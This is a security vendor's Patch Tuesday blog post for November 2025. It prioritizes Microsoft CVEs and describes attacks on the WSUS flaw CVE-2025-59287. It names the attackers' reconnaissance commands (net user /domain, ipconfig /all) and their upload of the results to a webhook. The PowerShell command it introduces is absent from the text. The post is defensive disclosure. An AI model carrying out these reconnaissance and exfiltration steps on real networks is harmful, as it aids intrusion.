Threat intel · 3 MIN READ · BEN NAHORNEY AND MATT JASTRAM · NOV 12, 2025 · TAGS: vulnerability prioritization

TL;DR

• This month we’re reviewing threat actor activity associated with CVE-2025-59287, a critical vulnerability in the Windows Server Update Services (WSUS) process.
• Microsoft released 63 new CVEs this month.
• Read on to get a high-level overview of the vulnerabilities we think are most deserving of remediation ASAP.

November marks the beginning of the end-of-year sprint as orgs prepare for the holiday schedules. In the midst of all of that comes another Patch Tuesday, and this month’s security updates deserve prompt attention to ensure you’re not carrying vulnerabilities with you through the holiday season.

Patch Tuesday: November 11, 2025

There are 63 new CVEs in this month’s batch, including four marked as critical, two with remote code execution (RCE) conditions, and one zero-day vulnerability (and a partridge in a pear tree…too soon?). We’ve reviewed the release to save you time and think you should prioritize these vulnerabilities:

• Windows Kernel Elevation of Privilege Vulnerability (CVE-2025-62215): This is a zero-day vulnerability in the Windows kernel that could garner an attacker SYSTEM privileges. Exploitation involves winning a race condition, meaning specific timing and conditions are required to pull off a successful attack. This complexity would explain the CVSS score of 7.0, though clearly threat actors are finding success here. CISA just added this CVE to the Known Exploited Vulnerabilities (KEV) catalog. 
• GDI+ Remote Code Execution Vulnerability (CVE-2025-60724): This is an RCE vulnerability in the Windows graphics subsystem with a CVSS score of 9.8. What’s noteworthy here is a threat actor could implant a specially crafted file in a web page that, when an unsuspecting user views it, could call the vulnerable graphics library, trigger the vulnerable code, and allow an attacker to corrupt memory on the vulnerable device, gaining control over the system. 
• Microsoft Office Remote Code Execution Vulnerability (CVE-2025-62199): What’s concerning about this Office-related vulnerability is that the Preview Pane in Outlook could be used to trigger it. While Microsoft doesn’t go into great detail about the level of user interaction required, it implies that this “preview pain” (…I’ll see myself out…) could allow an attacker to send a specially crafted email triggering the exploit when a user scrolls through emails in Outlook, assuming the Preview Pane feature is enabled.
• Microsoft SQL Server Elevation of Privilege Vulnerability (CVE-2025-59499): This SQL injection vulnerability is worth prioritizing because it doesn’t require local access. Rather, a remote attacker who has obtained low-privilege credentials could exploit it remotely and gain access to sensitive information within the database. This CVE has been given a CVSS score of 8.8.

Exploit Tales: Windows Server Update Services (WSUS)

This month we’re taking a look at CVE-2025-59287, a vulnerability in Windows Server Update Services (WSUS), Microsoft’s legacy centralized update distribution service for keeping on-premises systems updated. This vulnerability allows unauthorized attackers to remotely execute code on impacted systems.

This is an unsafe deserialization vulnerability, meaning a threat actor could send arbitrary code to the WSUS service, which it opens and runs without properly vetting the data it was sent. Code execution within the WSUS process—which can run under the SYSTEM user—could give an attacker a foothold within part of an organization’s infrastructure responsible for updating and managing endpoints. With SYSTEM level control of such a machine, it’s possible for attackers to push out malicious payloads disguised as Microsoft updates to network endpoints.

This CVE was initially disclosed in October’s Patch Tuesday release, where we highlighted it as one of the key vulnerabilities to address. However, the Microsoft fix didn’t fully remediate the vulnerability for all Windows Server versions that were susceptible. Exploit code began to circulate online and threat actors started targeting vulnerable servers, leading Microsoft to release a new, out-of-band patch to address this activity. 

Expel saw several incidents where threat actors attempted to exploit vulnerable systems. In each case, the threat actors ran the following PowerShell command on the targeted server:

This command targets the IP address where the vulnerable WSUS instance is located using HTTPS port 8531—one of two default ports used by WSUS (the other is HTTP port 8530). 

It then uses net user /domain to display a list of all user accounts in the domain and ipconfig /all for information about network adapters on the server, including information such as IP addresses, subnet masks, and configured DNS servers.

Finally, it attempts to upload the gathered information to a predetermined webhook site managed by the bad actors. In most cases like this, threat actors are gathering information in order to learn about the network configuration before launching further attacks.

To protect against these attacks, we suggest applying the latest patch for CVE-2025-59287. If you can’t immediately patch it, block all inbound traffic on ports 8530 and 8531. It’s also important to ensure that servers running WSUS aren’t publicly exposed, as this poses a significant risk to an organization. 

CISA provides additional guidance on identifying if WSUS is running on a server. You can use PowerShell to check if WSUS is installed (`Get-WindowsFeature -Name UpdateServices`) or use the Server Manager Dashboard to check if WSUS is turned on as a server role. If your organization no longer uses WSUS, it should be disabled and removed to mitigate this and other vulnerabilities.

That’s all we have for this month’s Patch Tuesday blog. If you have questions about the vulnerabilities discussed here, drop us a line.